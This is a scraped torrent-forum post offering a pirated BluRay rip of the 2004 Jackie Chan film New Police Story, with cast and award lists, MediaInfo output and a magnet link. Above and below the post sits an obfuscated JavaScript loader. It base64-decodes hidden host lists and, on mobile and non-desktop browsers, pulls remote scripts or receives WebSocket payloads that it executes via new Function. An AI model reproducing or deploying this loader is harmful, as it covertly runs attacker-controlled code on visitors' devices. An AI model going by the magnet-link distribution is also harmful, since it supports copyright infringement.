新警察故事[国粤语配音/中文字幕].New.Police.Story.2004.1080p.BluRay.x265.10bit.DTS.3Audio 8.41GB

版主小s 1月前 155

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 新警察故事 / New Police Story

◎年 代 2004

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 动作 / 惊悚 / 犯罪

◎语 言 英语 / 汉语普通话 / 粤语

◎上映日期 2004-09-24(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt0386005/

◎豆瓣评分 7.7/10 (275589人评价)

◎豆瓣链接 https://movie.douban.com/subject/1306160/

◎片 长 123分钟

◎导 演 陈木胜 Benny Chan (id:1274293)

◎编 剧 袁锦麟 Alan Yuen (id:1312751)

◎演 员 成龙 Jackie Chan (id:1054531)

谢霆锋 Nicholas Tse (id:1050053)

杨采妮 Charlie Yeung (id:1018373)

蔡卓妍 Charlene Choi (id:1041425)

吴彦祖 Daniel Wu (id:1027502)

安志杰 Andy On (id:1045364)

尹子维 Terence Yin (id:1045571)

王杰 Dave Wong (id:1029137)

于荣光 Ringo Yu (id:1274556)

叶山豪 Hayama Go (id:1001604)

蒋怡 Coco Chiang (id:1045679)

伍允龙 Philip Ng (id:1316267)

孙淳 Chun Sun (id:1274640)

火星 Mars (id:1033056)

麦长青 Cheung-Ching Mak (id:1274580)

吴浩康 Deep Ng (id:1313361)

李天翔 Eric Li Tin Cheung (id:1312744)

文诗琪 Yoki Man (id:1430508)

叶运强 Wan-Keung Yip (id:1429117)

陈桂芬 Brenda Chan (id:1364465)

庄欣玲 Chong Yan-Ling (id:1419338)

谭王鸿 Wing Hung Tam (id:1339962)

何伟业 Wai-Yip Ho (id:1363760)

洪天明 Timmy Hung Tin-Ming (id:1314773)

刘以达 Tats Lau (id:1034328)

高皓正 Zac Koo (id:1315397)

张致恒 Steven Cheung (id:1042888)

梁敏仪 Winnie Leung (id:1032914)

卢惠光 Ken Lo (id:1032633)

关智斌 Kenny Kwan (id:1015445)

伍佰 Wu Bai (id:1015236)

樋口明日嘉 Asuka Higuchi (id:1051169)

蒋雅文 Mandy Chiang (id:1051567)

Hyun Jin Park Hyun Jin Park (id:1307444)

何华超 Tony Ho (id:1286723)

伍刚 Gang Wu (id:1284478)

吕有慧 Yau-wai Lui (id:1274578)

岑建勋 John Sham (id:1274474)

廖启智 Kai Chi Liu (id:1274268)

黄德斌 Tak-bun Wong (id:1274442)

吴嘉龙 Carl Wu (id:1214684)

彭敬慈 Samuel Pang (id:1132694)

连凯 Andrew Lin (id:1122837)

董韵诗 Barbie Tung (id:1299616)

苏志鸿 Solon So (id:1297999)

杨受成 Albert Yeung (id:1313455)

陈自强 Willie Chan (id:1280445)

陈木胜 Benny Chan (id:1274293)

成龙 Jackie Chan (id:1054531)

韦启良 Yee-Leung Wai (id:1300261)

潘耀明 Anthony Pun (id:1307639)

邱志伟 Chi Wai Yau (id:1301446)

黄锐民 Oliver Wong (id:1290844)

王晶晶 Wong Ching Ching (id:1305877)

赵崇邦 Sung Pong Choo (id:1280719)

黄国雄 Samuel Wong (id:1426248)

黄宏显 Eddy Wong (id:1302455)

温皓 Hao Wen (id:1396699)

黄宏达 Victor Wong (id:1307421)

何志辉 Brian Ho (id:1310960)

李忠志 Chung Chi Li (id:1014763)

曾景祥 Kinson Tsang (id:1299575)

吴慧冰 Louisa Ng (id:1357600)

◎标 签 香港 / 动作 / 警匪 / 犯罪 / 经典 / 2004 / 剧情 / 人性

◎简 介

陈国荣(成龙 饰)的所在那一组警察是警队精英,破案无数。阿祖(吴彦祖 饰)是总警师的儿子,却勾结了几个高官子弟( 蒋怡丶尹子维丶安志杰丶叶山豪)挑战警方。他们到银行抢劫,警钟敲响警察赶到时,就把阿荣及队员带进了一个早已设计好的空旷仓库里。警员都陷进了匪徒早已设计好的游戏程序里,残忍的被杀害,连阿荣女朋友可颐 (杨采妮 饰)的弟弟也被无法幸免。阿荣就此被停职,出于内疚也跟可颐分手了。 终日喝得烂醉的阿荣在酒吧遇到了阿锋(谢霆锋 饰),阿锋为了使阿荣振作起来,决定假扮警察告诉阿荣自己是上司派来要求得到阿荣协助翻案的新警员。 阿荣又遇到那群狠狠打击他的罪犯,与他们斗志斗勇,在警花莎莎(蔡卓妍 饰)的协助下知道匪徒当年的事件被编成了一部游戏,同时也知道了当年为何情报被泄漏的原因。

◎获奖情况 (共28项)

第41届台北金马影展 (2004)

金马奖 最佳男配角

└──吴彦祖 (id:1027502)

金马奖 最佳美术设计(提名)

金马奖 最佳动作设计

└──李忠志 (id:1014763)

金马奖 最佳剪辑(提名)

└──邱志伟 (id:1301446)

金马奖 最佳音效(提名)

└──曾景祥 (id:1299575)

金马奖 最佳视觉效果

观众票选最佳影片

第24届香港电影金像奖 (2005)

最佳电影(提名)

最佳导演(提名)

└──陈木胜 (id:1274293)

最佳男主角(提名)

└──成龙 (id:1054531)

最佳男配角(提名)

└──吴彦祖 (id:1027502)

最佳剪接(提名)

└──邱志伟 (id:1301446)

最佳动作设计(提名)

└──李忠志 (id:1014763)

最佳音响效果(提名)

└──曾景祥 (id:1299575)

最佳视觉效果(提名)

第25届中国电影金鸡奖 (2005)

最佳故事片(提名)

最佳男主角

└──成龙 (id:1054531)

最佳男配角(提名)

└──吴彦祖 (id:1027502)

最佳录音(提名)

└──曾景祥 (id:1299575)

第28届大众电影百花奖 (2006)

最佳故事片(提名)

最佳男主角(提名)

└──成龙 (id:1054531)

最佳男配角

└──谢霆锋 (id:1050053)

第11届中国电影华表奖 (2005)

优秀合拍片奖(提名)

第7届中国长春电影节 (2005)

金鹿奖 最佳华语故事片(提名)

金鹿奖 票房价值奖

第5届华语电影传媒大奖 (2005)

百家传媒年度致敬电影(提名)

第12届北京大学生电影节 (2005)

最佳男演员奖(提名)

└──成龙 (id:1054531)

最佳观赏效果奖(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 95297976219200747110821730998484894477 (0x47B1B8FC937E569E658F71EE1376830D)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.41 GiB

  8. Duration : 2 h 3 min

  9. Overall bit rate : 9 769 kb/s

  10. Encoded date : UTC 2021-10-29 07:35:12

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 3 min

  20. Bit rate : 6 503 kb/s

  21. Width : 1 920 pixels

  22. Height : 828 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.171

  30. Stream size : 5.60 GiB (67%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.75 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=7 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x828 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4353 (0x1101)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 2 h 3 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 344 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.16 GiB (14%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4354 (0x1102)

  59. Format : AC-3

  60. Format/Info : Audio Coding 3

  61. Commercial name : Dolby Digital

  62. Codec ID : A_AC3

  63. Duration : 2 h 3 min

  64. Bit rate mode : Constant

  65. Bit rate : 384 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : L R C LFE Ls Rs

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 31.250 FPS (1536 SPF)

  70. Compression mode : Lossy

  71. Stream size : 338 MiB (4%)

  72. Title : Mandarin

  73. Language : Chinese

  74. Service kind : Complete Main

  75. Default : No

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Audio #3

  79. ID : 4

  80. ID in the original source medium : 4352 (0x1100)

  81. Format : DTS

  82. Format/Info : Digital Theater Systems

  83. Codec ID : A_DTS

  84. Duration : 2 h 3 min

  85. Bit rate mode : Constant

  86. Bit rate : 1 509 kb/s

  87. Channel(s) : 6 channels

  88. Channel layout : C L R Ls Rs LFE

  89. Sampling rate : 48.0 kHz

  90. Frame rate : 93.750 FPS (512 SPF)

  91. Bit depth : 24 bits

  92. Compression mode : Lossy

  93. Stream size : 1.30 GiB (15%)

  94. Title : eng

  95. Language : English

  96. Default : No

  97. Forced : No

  98. Original source medium : Blu-ray


  99. Text #1

  100. ID : 5

  101. ID in the original source medium : 4612 (0x1204)

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 58 min

  107. Bit rate : 15.8 kb/s

  108. Count of elements : 1356

  109. Stream size : 13.4 MiB (0%)

  110. Title : chs

  111. Language : Chinese

  112. Default : Yes

  113. Forced : No

  114. Original source medium : Blu-ray


  115. Text #2

  116. ID : 6

  117. ID in the original source medium : 4610 (0x1202)

  118. Format : PGS

  119. Muxing mode : zlib

  120. Codec ID : S_HDMV/PGS

  121. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  122. Duration : 1 h 58 min

  123. Bit rate : 16.2 kb/s

  124. Count of elements : 1914

  125. Stream size : 13.7 MiB (0%)

  126. Title : cht

  127. Language : Chinese

  128. Default : No

  129. Forced : No

  130. Original source medium : Blu-ray


  131. Text #3

  132. ID : 7

  133. ID in the original source medium : 4608 (0x1200)

  134. Format : PGS

  135. Muxing mode : zlib

  136. Codec ID : S_HDMV/PGS

  137. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  138. Duration : 1 h 58 min

  139. Bit rate : 17.9 kb/s

  140. Count of elements : 2222

  141. Stream size : 15.2 MiB (0%)

  142. Title : eng

  143. Language : English

  144. Default : No

  145. Forced : No

  146. Original source medium : Blu-ray


  147. Menu

  148. 00:00:00.000 : 第 01 章

  149. 00:07:01.129 : 第 02 章

  150. 00:15:30.930 : 第 03 章

  151. 00:20:54.419 : 第 04 章

  152. 00:32:45.964 : 第 05 章

  153. 00:37:10.311 : 第 06 章

  154. 00:41:12.178 : 第 07 章

  155. 00:48:13.223 : 第 08 章

  156. 00:57:03.628 : 第 09 章

  157. 01:03:38.314 : 第 10 章

  158. 01:14:19.830 : 第 11 章

  159. 01:20:42.128 : 第 12 章

  160. 01:30:36.806 : 第 13 章

  161. 01:36:34.830 : 第 14 章

  162. 01:41:22.826 : 第 15 章

  163. 01:48:21.745 : 第 16 章




复制代码


TAGS 动作 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:D6662D9367B6D3D3B0EFBD1FD06D102BE90AA0E3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};